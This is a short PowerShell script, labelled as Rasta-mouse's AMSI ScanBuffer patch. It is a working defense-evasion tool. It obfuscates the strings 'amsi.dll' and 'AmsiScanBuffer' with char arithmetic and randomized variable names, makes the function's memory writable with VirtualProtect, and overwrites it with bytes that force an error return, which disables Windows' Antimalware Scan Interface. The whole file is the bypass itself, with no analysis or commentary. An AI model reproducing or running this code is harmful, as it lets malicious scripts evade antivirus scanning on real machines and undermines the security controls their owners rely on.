#Rasta-mouses Amsi-Scan-Buffer patch \n
$tctgl = @"
using System;
using System.Runtime.InteropServices;
public class tctgl {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dlinzt, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $tctgl

$kxtdgkk = [tctgl]::LoadLibrary("$([ChAR](97*83/83)+[cHaR](109)+[chaR]([BYTE]0x73)+[CHar]([Byte]0x69)+[CHAR]([BYtE]0x2e)+[cHAR](100*8/8)+[chAR]([byTE]0x6c)+[CHAr](108+70-70))")
$rolfsh = [tctgl]::GetProcAddress($kxtdgkk, "$([chAr]([Byte]0x41)+[CHaR]([BYtE]0x6d)+[CHaR]([BytE]0x73)+[char](93+12)+[chAR]([bYte]0x53)+[chAr]([bYte]0x63)+[ChAr]([bYte]0x61)+[chaR](96+14)+[cHAr]([byte]0x42)+[cHaR]([ByTE]0x75)+[ChAR](102)+[CHAr]([BytE]0x66)+[cHaR]([byte]0x65)+[char](114*77/77))")
$p = 0
[tctgl]::VirtualProtect($rolfsh, [uint32]5, 0x40, [ref]$p)
$wzbx = "0xB8"
$rzut = "0x57"
$xput = "0x00"
$yyby = "0x07"
$iksp = "0x80"
$dydv = "0xC3"
$tenvb = [Byte[]] ($wzbx,$rzut,$xput,$yyby,+$iksp,+$dydv)
[System.Runtime.InteropServices.Marshal]::Copy($tenvb, 0, $rolfsh, 6)
